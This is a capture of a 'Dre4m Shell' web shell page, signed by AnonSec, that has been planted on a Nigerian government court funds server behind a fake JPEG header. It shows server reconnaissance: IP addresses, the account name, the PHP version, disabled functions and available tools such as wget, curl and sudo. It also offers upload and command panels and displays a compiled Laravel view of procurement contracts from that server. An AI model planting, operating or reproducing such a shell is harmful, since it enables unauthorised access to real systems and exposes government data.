ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.224.58.152
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/storage/framework/views/78cc567a11acd3aceb14b2e196b3386a84a86e42.php
<div class="container box box-default">
    <div class="box-body box-profile" style="background: #ffffff;">
        <div class="row">
            <div class="col-md-12">
            	
            	<?php echo $__env->make('layouts.allReportHeader', ['companyName'=>'defaultName', 'companyAddress'=>'defaultAddress', 'title1'=>'All Contract Details', 'title2'=>date('d-l, F, Y'), 'showOnlyTitle1'=>1, 'showOnlyTitle2'=>1, 'hideLogos'=>0, 'hideAddress'=>0], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
            
            	
            </div>
            <div class="col-md-12">
                <table class="table table-bordered table-responsive table-condensed table-hover table-stripped">
                    <thead class="text-success bg-gray" >
                    <tr>
                        <th>S/N</th>
                        <th>File No.</th>
                        <th>Contractor Name</th>
                        <th>Value</th>
                        <th> Awarded Date</th>
                        <th>Description</th>
                        <th>Date Created</th>
                        <?php if($showContractEdit == 1): ?>
                            <th>Edit</th>
                        <?php endif; ?>
                        <th>Upload</th>
                        <?php if($showContractAction == 1): ?>
                        <th><div align="center">Status</div></th>
                        <?php endif; ?>
                        <th>Comment</th>
                    </tr>
                    </thead>
                    <tbody class="bg-silver">
                    <?php if($allContract): ?>
                        <?php $key = 1; ?>
                        <?php $__currentLoopData = $allContract; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $listCont): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <tr>
                                <td><?php if( method_exists($allContract,'links') ): ?><?php echo e(($allContract->currentpage()-1) * $allContract->perpage() + $key); ?> <?php else: ?> <?php echo e($key); ?> <?php endif; ?></td>
                                <td><?php echo e($listCont->fileNo); ?></td>
                                <input type="hidden" id="getFileNoModal<?php echo e($listCont->contractID); ?>" value="<?php echo e($listCont->fileNo); ?>" />
                                <td><?php echo e($listCont->contractor); ?> <input type="hidden" id="showContractorName<?php echo e($listCont->contractID); ?>" value="<?php echo e($listCont->contractor); ?>" /></td>
                                <td>
                                    <?php echo e(number_format((App\Http\Controllers\ProcurementContractController::getContractValue($listCont->fileNo)), 2, '.', ',')); ?>

                                </td>
                                <input type="hidden" id="getAmount<?php echo e($listCont->contractID); ?>" value="<?php echo e(App\Http\Controllers\ProcurementContractController::getContractValue($listCont->fileNo)); ?>" />
                                <input type="hidden" id="getLiabilityAmount<?php echo e($listCont->contractID); ?>" value="<?php echo e($listCont->liability_amount); ?>" />
                                <td><?php echo e(date_format(date_create($listCont->award_date), "d-D M, Y")); ?></td>
                                <td width="500">
                                    <?php if(strlen($listCont->description) > 300): ?><?php echo e(substr($listCont->description,0, 300)); ?>

                                    <b>...<a href="#" id="<?php echo e($listCont->contractID); ?>" class="getAllValue">View more</a> </b>
                                    <input type="hidden" id="getAllValue<?php echo e($listCont->contractID); ?>" value="<?php echo e($listCont->description); ?>" />
                                    <?php else: ?>
                                        <?php echo e(substr($listCont->description,0, 300)); ?>

                                    <?php endif; ?>
                                </td>
                                <td><?php echo e(date_format(date_create($listCont->created_at), "d-D M, Y")); ?></td>
                                <?php if($showContractEdit == 1): ?><!--and $userRole == "DP"-->
                                    <td align="center">
                                        <button class="btn btn-default input-sm editContract" id="<?php echo e($listCont->contractID); ?>"><i class="fa fa-edit"></i></button><br />
                                        <small><i class="fa fa-calendar"><small><?php echo e(date_format(date_create($listCont->updated_at), "d-m, Y")); ?></small></i></small>
                                    </td>
                                <?php endif; ?>
                                <td>
                                    <div align="center">
                                        <button class="btn btn-default input-sm showFileModal" id="<?php echo e($listCont->contractID); ?>"><i class="fa fa-upload"></i></button>
                                        <br />
                                        <a style="cursor: pointer" title="Click to view" class="myBtnView" id="<?php echo e($listCont->contractID); ?>">Total File: <?php echo e($totalUpload[$key][$listCont->contractID]); ?></a>
                                    </div>
                                </td>
                                <?php if($showContractAction == 1): ?>
                                <td width="300">
                                    <div align="center">
                                        <button type="button" class="btnShowModal btn btn-primary input-sm" id="<?php echo e($listCont->contractID); ?>">
                                            <small>Push To Next Office</small>
                                        </button>
                                    </div>
                                </td>
                                <?php endif; ?>
                                <td width="300">
                                    <div align="center">
                                        <button type="button" class="btnShowModalComment btn btn-primary input-sm" id="<?php echo e($listCont->contractID); ?>">
                                            <small>View Comment</small>
                                        </button>
                                    </div>
                                </td>
                            </tr>
                            

                            <?php echo $__env->make('njc.modalBodyViewFile', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
                            <?php echo $__env->make('njc.modalBodyEditContract', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
                            <?php echo $__env->make('njc.viewAllContrantComment', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
                            <?php $key ++; ?>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        <tr>
                            <td colspan="9" class="bg-silver">
                                <?php if( method_exists($allContract,'links') ): ?>
                                    <div class="row">
                                        <div align="left" class="col-sm-8 hidden-print"><?php echo e($allContract->links()); ?></div>
                                        <div align="right" class="col-sm-4">
                                            Showing <?php echo e(($allContract->currentpage()-1)*$allContract->perpage()+1); ?>

                                            - <?php echo e($allContract->currentpage()*$allContract->perpage()); ?>

                                            of  <?php echo e($allContract->total()); ?> Entries
                                        </div>
                                    </div>
                                <?php endif; ?>
                            </td>
                        </tr>
                    <?php else: ?>
                        <tr>
                            <td colspan="8" class="text-danger">
                                No record found yet!
                            </td>
                        </tr>
                    <?php endif; ?>
                    </tbody>
                </table>

            </div>
        </div>
        <hr />
    </div>
     <?php echo $__env->make('njc.modalBodyUploadFile', ['modalHeader' => 'Upload Contract Files', 'modalMessage' => 'You about to upload Contract document attached ', 'modalField' =>'<input type="file" class="form-control input-lg"  id="file" name="file" required />'], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
<!--// -->
    <?php echo $__env->make('njc.modalBodyProcurement', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
</div>
<?php /**PATH /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/resources/views/njc/viewAllContractContent.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team